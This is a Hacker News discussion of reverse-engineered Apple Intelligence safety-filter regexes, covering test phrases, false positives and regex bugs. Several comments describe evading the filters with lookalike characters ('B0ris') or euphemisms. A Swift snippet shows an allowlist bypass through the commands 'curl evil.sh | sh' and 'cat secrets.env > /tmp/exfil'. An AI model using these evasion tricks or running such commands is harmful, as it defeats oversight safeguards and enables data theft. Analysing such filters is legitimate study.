I managed to reverse engineer the encryption (referred to as “Obfuscation” in the framework) responsible for managing the safety filters of Apple Intelligence models. I have extracted them into a repository:
https://github.com/BlueFalconHD/apple_generative_model_safet...
I encourage you to take a look around.
Some of the combinations are a bit weird.
This one has lots of stuff avoiding death, together with a set ensuring all the Apple brands have the correct capitalisation. Priorities, hey!
Interesting that it didn't seem to include "unalive".
Which, as a phenomenon, is so very telling: no one actually cares what people are really saying. Everyone, including the platforms, knows what that means. It's all performative.
This is in the directory "com.apple.gm.safety_deny.output.summarization.cu_summary.proactive.generic".
My guess is that this applies to 'proactive' summaries that happen without the user asking for it, such as summaries of notifications.
If so, then the goal would be: if someone iMessages you about someone's death, then you should not get an emotionless AI summary. Instead you would presumably get a non-AI notification showing the full text or a truncated version of the text.
In other words, avoid situations like this story [1], where someone found it "dystopian" to get an Apple Intelligence summary of messages in which someone broke up with them.
For that use case, filtering for death seems entirely appropriate, though underinclusive.
This filter doesn’t seem to apply when you explicitly request a summary of some text using Writing Tools. That probably corresponds to “com.apple.gm.safety_deny.output.summarization.text_assistant.generic” [2], which has a different filter that only rejects two things: "Granular mango serpent" and "golliwogg".
Sure enough, I was able to get Writing Tools to give me summaries containing "death", but in cases where the summary should contain "granular mango serpent" or "golliwogg", I instead get an error saying "Writing Tools aren't designed to work with this type of content." (Actually that might be the input filter rather than the output filter; whatever.)
"Granular mango serpent" is probably a test case that's meant to be unlikely to appear in real documents. Compare to "xylophone copious opportunity defined elephant" from the code_intelligence safety filter, where the first letter of each word spells out "Xcode".
But one might ask what's so special about "golliwogg". It apparently refers to an old racial caricature, but why is that the one and only thing that needs filtering?
[1] https://arstechnica.com/ai/2024/10/man-learns-hes-being-dump...
[2] https://github.com/BlueFalconHD/apple_generative_model_safet...
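For the curious: the matching these deny rules imply is easy to reproduce with NSRegularExpression. A minimal sketch using the golliwogg pattern quoted above; the harness around it is a guess, not Apple's actual evaluation code:

    import Foundation

    // One of the actual patterns from the extracted files. The harness
    // around it is guesswork, not Apple's evaluation logic.
    let pattern = "(?i)\\bgolliwogg?\\b"
    let regex = try! NSRegularExpression(pattern: pattern)

    func isDenied(_ text: String) -> Bool {
        let range = NSRange(text.startIndex..., in: text)
        return regex.firstMatch(in: text, options: [], range: range) != nil
    }

    print(isDenied("a summary that mentions death"))  // false: not in this file's rules
    print(isDenied("a Golliwog on the shelf"))        // true: "gg?" makes the second g optional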
Also feels like some of these would match totally innocuous usage.
"I'm overloaded for work, I'd be happy if you took some of it off me."
"The client seems to have passed on the proposed changes."
Both of those would match the "death regexes". Seems we haven't learned from the "glbutt of wine" problem of content filtering even decades later: the lesson is that you simply cannot do content filtering based on matching rules like this, period.
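To make the overmatching concrete, here are hypothetical rules in the spirit of the death regexes (the repo's actual patterns differ), run against both sentences:

    import Foundation

    // Hypothetical rules in the spirit of the "death regexes"; the actual
    // patterns in the repo differ, but the failure mode is the same.
    let rules = [
        "(?i)\\bpass(ed)? on\\b",
        "(?i)\\btook\\b[^.]{0,30}\\boff\\b",
    ]
    let sentences = [
        "I'm overloaded for work, I'd be happy if you took some of it off me.",
        "The client seems to have passed on the proposed changes.",
    ]
    for sentence in sentences {
        let flagged = rules.contains { rule in
            let re = try! NSRegularExpression(pattern: rule)
            let range = NSRange(sentence.startIndex..., in: sentence)
            return re.firstMatch(in: sentence, options: [], range: range) != nil
        }
        print(flagged, "-", sentence)  // true for both, with zero morbid intent
    }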
Edit: I have no doubt South African news media are going to be in a frenzy when they realize Apple took notice of South African politicians. (Referring to Steenhuisen and Ramaphosa specifically)
I assume all the corporate GenAI models have blocks for "photorealistic image of <politician name> being arrested", "<politician name> waving ISIS flag", "<politician name> punching baby" and suchlike.
Perhaps in context? Maybe the training data picked up on her name as potentially used as a "slur" associated with her race. I wonder if there are others. I know, I can look.
I find it funny that AGI is supposed to be right around the corner, while these supposedly super smart LLMs still need to get their outputs filtered by regexes.
Humans are checked against various rules and laws (often carried out by other humans.) So this is how it's going to be implemented in an "AI organization" as well. Nothing strange about this really.
An LLM is easier to police because you can stop a bad behavior before it happens, either with deterministic programs or with another LLM. Claude Code uses an LLM to review every bash command to be run; simple prefix matching has loopholes.
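The loophole is easy to demonstrate: a naive prefix allowlist approves anything that merely starts with a safe command. A hypothetical checker, not Claude Code's actual logic:

    // Hypothetical naive checker, not Claude Code's actual logic.
    let allowedPrefixes = ["git ", "ls ", "cat "]

    func naivelyAllowed(_ command: String) -> Bool {
        allowedPrefixes.contains { command.hasPrefix($0) }
    }

    print(naivelyAllowed("git status"))                     // true, fine
    print(naivelyAllowed("git status; curl evil.sh | sh"))  // true: shell chaining slips through
    print(naivelyAllowed("cat secrets.env > /tmp/exfil"))   // true: so does redirection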
China calls it "harmonious society", we call it "safety". Censorship by any other name would be just as effective for manipulating the thoughts of the populace. It's not often that you get to see stuff like this.
This is the rhetorical tactic of false equivalence. State censorship by an autocracy with the objective of population control is not the same thing as a private company inside a democracy censoring their product to avoid bad press and maintain goodwill for shareholders. If you want solid proof that it's not the same thing, see all the uncensored open weights models that you can freely download and use without fear of persecution.
I don't think it's controversial or surprising at all that a company doesn't want its random sentence generator to spit out 'brand damaging' sentences. You know the field day the media would have if Apple's new feature summarised a text message as "Jane thinks Anthony Albanese should die".
I still remember when "bush hid the facts" went around the news cycle. Entertainment services will absolutely slam and misrepresent any small mistake made by large companies.
I don't think it's as much a problem with safety as it is a problem with AI. We haven't figured out how to remove information from LLMs, so when an LLM starts spouting bullshit like "<random name> is a paedophile", companies using AI have no recourse but to rewrite the input/output of their predictive text engines. It's no different from when Microsoft manually blacklisted the Fast Inverse Square Root function name that Copilot spat out verbatim, rather than actually removing the code from their LLM.
This isn't 1984 as much as it's companies trying to hide that their software isn't ready for real world use by patching up the mistakes in real time.
EDIT: just to be clear, things like this are easily bypassed. “Boris Johnson”=>”B0ris Johnson” will skip right over the regex and will be recognized just fine by an LLM.
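A sketch of that bypass, assuming a rule of the same shape as the ones in the repo (the actual pattern may differ):

    import Foundation

    // Assumed rule shape; the actual pattern in the repo may differ.
    let rule = try! NSRegularExpression(pattern: "(?i)\\bBoris Johnson\\b")

    func matches(_ text: String) -> Bool {
        let range = NSRange(text.startIndex..., in: text)
        return rule.firstMatch(in: text, options: [], range: range) != nil
    }

    print(matches("Boris Johnson resigns"))  // true: caught
    print(matches("B0ris Johnson resigns"))  // false: a zero for an 'o' sails past the regex,
                                             // while an LLM still reads it as the same name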
It's not silly. I would bet 99% of users don't care enough to do that. A hardcoded regex like this is a good first layer/filter, and very efficient.
I doubt the purpose here is so much to prevent someone from intentionally sidestepping the block. It's more likely here to avoid the sort of headlines you would expect to see if someone was suggested "I wish ${politician} would die" as a response to an email mentioning that politician. In general you should view these sorts of broad word filters as looking to short circuit the "think of the children" reactions to Tiny Tim's phone suggesting not that God should "bless us, every one", but that God should "kill us, every one". A dumb filter like this is more than enough for that sort of thing.
> If things are like this at Apple I’m not sure what to think.
I don't know what you expected? This is the SOTA solution, and Apple is barely in the AI race as-is. It makes more sense for them to copy what works than to bet the farm on a courageous feature nobody likes.
What prevents Apple from applying a quick anti-typo LLM which restores B0ris, unalive, fixs tpyos, and replaces "slumbering steed" with a "sleeping horse", not just for censorship, but also to improve generation results?
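Nothing, in principle. Even without an LLM, a cheap normalization pass in front of the regexes would catch the easy substitutions. A hypothetical sketch; nothing in the extracted files suggests Apple actually does this:

    // Hypothetical pre-filter normalization; nothing in the extracted
    // files suggests Apple actually does this.
    let homoglyphs: [Character: Character] = [
        "0": "o", "1": "l", "3": "e", "4": "a", "5": "s", "@": "a",
    ]

    func normalize(_ text: String) -> String {
        String(text.map { homoglyphs[$0] ?? $0 })
    }

    print(normalize("B0ris Johnson"))  // "Boris Johnson": the plain regex now fires
    // Euphemisms like "unalive" or "slumbering steed" have no character-level
    // fix, though; that rewrite really would need a small model.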
Why are these things always so deeply unserious? Is there no one working on "safety in AI" (an oxymoron in itself, of course) who has a meaningful understanding of what they are actually working with, and an ability beyond an intern's weekend project?
Reminds me of the cybersecurity field that got the 1% of people able to turn a double free into code execution while 99% peddle checklists, "signature scanning" and deal in CVE numbers.
Meanwhile their software devs are making GenerativeExperiencesSafetyInferenceProviders so it must be dire over there, too.
I'm pretty sure these are the filters that aim to suppress embarrassing or liability inducing email/messages summaries, and pop up the dismissible warning that "Safari Summarization isn't designed to handle this type of content," and other "Apple Intelligence" content rewriting. They filter/alter LLM output, not input, as some here seem to think. Apple's on device LLM is only 3b params, so it can occasionally be stupid.
A lot of these terms are very weird and bland. Honestly I'm mostly reminded of Apple's bizarre censorship screw-up that didn't blow up that much, even though it was pretty uniquely embarrassing:
https://www.theverge.com/2021/3/30/22358756/apple-blocked-as...
It may be a squeamish ossifrage [1] or a seraphim proudleduck [2], which is to say that it was an artificial phrase chosen to be extremely unlikely to occur naturally. In this case, the purpose is likely QA. It's much easier to QA behavior with a special-purpose but otherwise unoffensive phrase than to make your QA team repeatedly say allegedly offensive things to your AI.
[1] https://en.wikipedia.org/wiki/The_Magic_Words_are_Squeamish_...
[2] https://en.wikipedia.org/wiki/SEO_contest
There is definitely some testing stuff in here (e.g. the “Granular Mango Serpent” one) but there are real rules. Also if you test phrases matched by the regexes with generation (via Shortcuts or Foundation Models Framework) the blocklists are definitely applied.
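That's easy to try with the Foundation Models framework; roughly something like this sketch (the exact error surface may differ):

    import FoundationModels

    // Rough sketch of probing the on-device model with a blocklisted
    // phrase; the exact error surface may differ in practice.
    func probe(_ prompt: String) async {
        let session = LanguageModelSession()
        do {
            let response = try await session.respond(to: prompt)
            print("OK:", response.content)
        } catch let error as LanguageModelSession.GenerationError {
            print("Refused (guardrail/safety):", error)
        } catch {
            print("Other error:", error)
        }
    }

    await probe("Summarize these notes about the granular mango serpent.")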
This specific file you’ve referenced is the v1 format, which solely handles substitution. It substitutes the offensive term with “test complete”.
Some of the data for locale "CN" has a long list of forbidden phrases. Broad coverage of words related to sexual deviancy, as expected. Not much on the political side, other than blocks on religious subjects.[1]
This is definitely an old test left in. But that word isn’t just a silly one, it is offensive (google it). This is the v1 safety filter: it simply maps strings to other strings, in this case changing golliwog into “test complete”. Unless I missed some, the rest of the files use v2, which allows for more complex rules.
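As a sketch of what that v1 shape amounts to, with illustrative field names rather than the repo's exact schema:

    import Foundation

    // Illustrative only; the keys/structure of the real v1 files may differ.
    struct SafetyOverrideV1: Decodable {
        let substitutions: [String: String]
    }

    func applyV1(_ override: SafetyOverrideV1, to text: String) -> String {
        var result = text
        for (term, replacement) in override.substitutions {
            result = result.replacingOccurrences(
                of: term, with: replacement, options: .caseInsensitive)
        }
        return result
    }

    let v1 = SafetyOverrideV1(substitutions: ["golliwogg": "test complete"])
    print(applyV1(v1, to: "a golliwogg doll"))  // "a test complete doll"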
Speculation: maybe they know that the real phrase is close enough in the vector space to be treated as synonymous with "granular mango serpent". The phrase is then like a nickname whose expected inference only the model's authors know?
Thus a pre-prompt can avoid mentioning the actual forbidden words, like using a patois/cant.
I commented in another thread [1] that it's most likely a unique, artificial QA input, to avoid QA having to repeatedly use offensive phrases or whatever.
[1] https://news.ycombinator.com/item?id=44486374
These are exactly the contents read by the Obfuscation functions. There seems to be a lot of testing stuff still, though; remember, these models are relatively recent. There is a true safety model applied after these checks as well; this is just to catch things before needing to load the safety model.
It also contains some German(-speaking) locales to filter out things like Fuhrer and Führer. But the filters are so scarce, and the magical phrases so prevalent, that I think this is mostly test code at the moment.
"[\\b\\d][Aa]bbo[\\bA-Z\\d]",
\b inside a set (square brackets) is a backspace character [1], not a word boundary. I don't think it was intended? Or is the regex flavor used here different?
[0] https://github.com/BlueFalconHD/apple_generative_model_safet...
[1] https://developer.apple.com/documentation/foundation/nsregul...
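Easy to confirm in isolation; ICU, the engine behind NSRegularExpression, treats \b inside a class as U+0008:

    import Foundation

    // In ICU (NSRegularExpression's engine), \b inside a character class
    // is the backspace character U+0008, not a word boundary.
    let insideClass = try! NSRegularExpression(pattern: "[\\b\\d]")

    func hits(_ text: String) -> Bool {
        let range = NSRange(text.startIndex..., in: text)
        return insideClass.firstMatch(in: text, options: [], range: range) != nil
    }

    print(hits("7"))      // true: a digit
    print(hits("\u{8}"))  // true: a literal backspace
    print(hits("Abbo"))   // false: no word-boundary behavior inside the class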
The framework loading these is in Swift. I haven’t gotten around to the logic for the JSON/regex parsing yet, but ChatGPT seems to understand the regexes just fine.
One additional note for everyone: this is an additional safety step on top of the safety model, so it isn’t exhaustive; there is plenty more that the actual safety model catches, and that can’t easily be extracted.
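So the overall shape is a cheap deterministic pre-filter in front of a heavier model. Entirely illustrative:

    import Foundation

    enum Verdict { case allow, deny }

    // Entirely illustrative layering; the names and structure are not Apple's.
    func checkOutput(_ text: String,
                     denyRegexes: [NSRegularExpression],
                     safetyModel: (String) -> Verdict) -> Verdict {
        // Layer 1: regex blocklist; microseconds, no model load required.
        let range = NSRange(text.startIndex..., in: text)
        if denyRegexes.contains(where: { $0.firstMatch(in: text, options: [], range: range) != nil }) {
            return .deny
        }
        // Layer 2: only now pay the cost of the actual safety model.
        return safetyModel(text)
    }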
You can design a racist propaganda poster, put someone's face onto a porn pic or manipulate evidence with photoshop. Apart from super specific things like trying to print money, the tool doesn't stop you from doing things most people would consider distasteful, creepy or even illegal.
So why are we doing this now? Has anything changed fundamentally? Why can't we let software do everything and then blame the user for doing bad things?
I think what changed is that we at least can attempt to limit 'bad' things with technical measures. It was legitimately technically impossible 10 years ago to prevent Photoshop from designing propaganda posters. Of course today's 'LLM safety' features aren't watertight either, but with the combination of 'input is natural language' plus LLM-based safety measures, there are more options today to restrict what the software can do than in the past.
The example you gave about preventing money counterfeiting with technical measures also supports this, since this was an easier thing to detect technically, and so it was done.
Whether that's a good thing or bad thing everyone has to decide for themselves, but objectively I think this is the reason.
What's hard to understand here? Those tools require skill and time to develop. AI makes things like those racist posters and revenge porn completely effortless and instant.
What are they protecting against? Honestly. LLMs should probably have an age limit, and then, if you are above, you should be adult enough to understand what this is and how it can be used.
To me, it seems like they only protect against bad press
Yes, it is indeed to mitigate bad press. Unfortunately, the discussion about AI is so ridiculous that it is often considered newsworthy when a product generates something funky for a person with a large enough Twitter audience. Nobody wants to answer the questions about why their LLM generated it and how they will prevent it in the future.
Like asking candidates for sensitive employment about Kim Jong Un's roundness to check if they're North Korean spies, we could ask humans what they think about Trump and Palestine to check if they're computers.
However, I think about half of real humans would also fail the test.
The funny thing is, I have an AU/VST plugin for altering only the exponents, not the mantissas, of audio samples (simple powers-of-2 multiply/divide) called BitShiftGain.
So any time I say that on YouTube, it figures I'm saying another word that's in Apple safety filters under 'reject', so I have to always try to remember to say 'shifting of bits gain' or 'bit… … … shift gain'.
So there's a chain of machine interpretation by which Apple can decide I'm a Bad Man. I guess I'm more comfortable with Apple reaching this conclusion? I'll still try to avoid it though :)
Some of these are absolutely wild – com.apple.gm.safety_deny.input.summarization.visual_intelligence_camera.generic [1] – a camera input filter – rejects "Granular mango serpent and whales" and anything matching "(?i)\\bgolliwogg?\\b".
I presume the granular mango is to avoid a huge chain of ever-growing LLM slop garbage, but honestly, it just seems surreal. Many of the files have specific filters for nonsensical English phrases. Either there's some serious steganography I'm unaware of, or, I suspect more likely, it's related to a training pipeline?
[1] https://github.com/BlueFalconHD/apple_generative_model_safet...
I believe the "granular mango serpent" is an uncommon testing phrase that they use, although now with this discussion it has suffered the same fate as "correct horse battery staple.
The more concerning thing is that some of the locales like it-IT have a blocklist that contains most countries' names; I wonder what that's about.
Is this related in any way to Core ML model encryption (https://developer.apple.com/documentation/coreml/encrypting-...)? I find that feature a little bizarre because Apple has historically avoided providing any kind of DRM solution for app asset protection.
Nope. This is a separate system. It’s not even abstracted to handle arbitrary assets; it is specifically only for these overrides. The decryption is done in the ModelCatalog private framework.
No shoot, bombs, or bombers? I guess Apple isn't interested in military contracts. Or, frankly, any work for world peace organizations dedicated to detecting and preventing genocide. And without talk of losing lives, much of the gaming industry is out too.
But I don't see the really bad stuff, the stuff I won't even type here. I guess that remains fair game. Apple's priorities remain as weird as ever.
The International Criminal Court is banned from using Microsoft products. Corporations really don't want to be involved in anything controversial unless it brings correspondingly large profits.
andy99|7 months ago
To me that's really embarrassing and insecure. But I'm sure for branding people it's very important.
jofzar|7 months ago
https://thehill.com/policy/technology/5312421-ocasio-cortez-...
cyanydeez|7 months ago
Y'all love capitalism until it starts manipulating the populace into the safest space to sell you garbage you don't need.
Then suddenly it's all "ma free speech".
waterproof|7 months ago
It was generated as part of this PR to consolidate the metadata.json files: https://github.com/BlueFalconHD/apple_generative_model_safet...
RachelF|7 months ago
Seems like Apple now has a list of 7,000 words you can't use on an iPhone.
fouronnes3|7 months ago
https://arstechnica.com/information-technology/2024/12/certa...
Ey7NFZ3P0nzAe|7 months ago
https://github.com/BlueFalconHD/apple_generative_model_safet...
"Aide sociale" (welfare), "Chomeur" (unemployed), "Sans abri" (homeless), "Démuni" (destitute)
That's insane!
Animats|7 months ago
This may be test data. Found [1].
[1] https://github.com/BlueFalconHD/apple_generative_model_safet...
consonaut|7 months ago
Maybe it's an easy test to ensure the filters are loaded, using a phrase unlikely to be used accidentally?
airstrike|7 months ago
wyvern illustrous laments darkness
mindcrash|7 months ago
What the actual fuck? Censorship much?
plutokras|7 months ago
They are protecting their producer from bad PR.
Y_Y|7 months ago
https://en.wikipedia.org/wiki/Golliwog
https://github.com/BlueFalconHD/apple_generative_model_safet...